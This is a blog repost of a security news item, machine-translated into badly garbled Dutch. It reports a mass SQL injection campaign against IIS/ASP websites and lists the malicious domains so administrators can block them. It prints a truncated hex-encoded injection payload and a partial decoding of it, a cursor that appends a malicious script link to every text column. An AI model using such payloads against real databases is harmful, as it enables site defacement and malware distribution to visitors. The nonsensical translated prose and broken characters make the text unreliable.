Uw beste bron van informatie en nieuws ongeveer geheimen, uitzicht en bestuurders op Internet

De ARTIKELEN van het uitzicht BOVENKANT 50 De VIDEO'S van het uitzicht SOFT van het uitzicht De HULP van het uitzicht

SQL van de massa injecties


Vroeger deze week publiceerde ik a post betreffende een kwetsbaarheid in verscheidene versies van Microsoft Windows
… Goed is de kwetsbaarheid nu uit:voeren-daar is een andere ronde van SQL van de Massa injecties die gaan op welke honderdduizenden websites besmet heeft die op het platform IIS lopen.

Het voorvormen van een eenvoudig onderzoek Google naar sporen van het kwaadwillige manuscript resulteert over in 510.000 gewijzigde pagina's.

Met more and more websites die een SQL achterste deel gebruiken om hen sneller en dynamischer te maken, betekent het ook dat het essentieel is om te verifiren welke informatie van die gegevensbestanden binnen opgeslagen of gevraagd wordt - vooral als u gebruikers toestaat om inhoud te uploaden zelf die de hele tijd in besprekingsforums gebeurt, blogs, koppel vormen enz. terug Tenzij dat gegeven wordt gezuiverd alvorens het gespaard wordt kunt u niet controleren wat de website aan de gebruikers zal tonen. Dit is welke SQL injectie ongeveer allen die is, zwakheden in deze controles exploiteert.

Momenteel het kwaadwillige dossier dat wordt ingespoten is 1.js nochtans moet men opmerken dat dit in om het even welk stadium kon veranderen. De bezoekers aan deze website zijn € œtreated€ aan verschillende 8 exploiteert voor vele vensters gebaseerde toepassingen met inbegrip van DOEL, RealPlayer, en iTunes. NIETbezoek plaatsen die met deze plaats verbinden aangezien u zeer waarschijnlijk zullen besmet worden. Trendmicro genoemd malware toj_agent.KAQ het let op voor wachtwoorden en geeft hen aan contoller€ ™s ip terug.

In dit geval vertrekt de injectiecode als dit (de nota, dit is niet de volledige code):

   DECLARE%20@S%20NVARCHAR (4000); SET%20@S=CAST (0x440045004300
    4C00410052004500200040005400200076006100720063006800610072
    00280032003500350029002C0040004300200076006100720063006800
    610072002800320035003500290020004400450043004C004100520045
    0020005400610062006C0065005F0043007500720073006F0072002000
    43005500520053004F005200200046004F0052002000730065006C0065
    0063007400200061002E006E0061006D0065002C0062002E006E006100
    6D0065002000660072006F006D0020007300790073006F0062006A0065
    00630074007300200061002C0073007900730063006F006C0075006D00
    6E00730020006200200077006800650072006500200061002E00690064
    003D0062002E0069006400200061006E006400200061002E0078007400
    7900700065003D00270075002700200061006E0064002000280062002E
    00780074007900700065003D003900390020006F007200200062002E00
    780074007900700065003D003300350020006€ 

 die wanneer gedecodeerd wordt:

   VERKLAART @T varchar (255) 'varchar @C (255) de CURSEUR 
  van Table_Cursor  VOOR uitgezochte a.name'b.name van sysobjects a'syscolumns B 
   waar a.id=b.id en a.xtype='u VERKLAART en (b.xtype=99 of b.xtype=35
    of b€

Wat gebeurt dientengevolge? Het vindt alle tekstgebieden in het gegevensbestand en voegt een verbinding aan kwaadwillige javascript toe aan elke n van hen welke uw website zal maken hen automatisch tonen. Zo hoofdzakelijk was wat gebeurde dat de aanvallers ASP zochten of Aspx- pagina's die om het even welk type van het querystring van (een dynamische waarde zoals een artikelidentiteitskaart, productidentiteitskaart, enz.) bevatten parameter en probeerden om dat te gebruiken om hun SQL injectiecode te uploaden.

Tot dusver zijn drie verschillende domeinen gebruikt om de kwaadwillige inhoud “€ te ontvangen nmidahena.com, aspder.com en nihaorr1.com. Er is een reeks dossiers die van deze plaatsen geladen wordt dat probeert om verschillend te gebruiken exploiteert om een online trojan gokken te installeren. Op dit ogenblik is de aanvankelijke prestatiepagina op alle domeinen ontoegankelijk maar dat kon veranderen. So if you’re a firewall administrator we recommend you to block access to them.

I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

Info sourced from f-secure

Popularity: 2%


Written by Patrick S. Read more great feeds at is source WEBSITE
no comments.
Read more articles on otherSoftware and MS News.

Related articles

No comments

There are still no comments on this article.

Leave your comment...

If you want to leave your comment on this article, simply fill out the next form:




You can use these XHTML tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong> .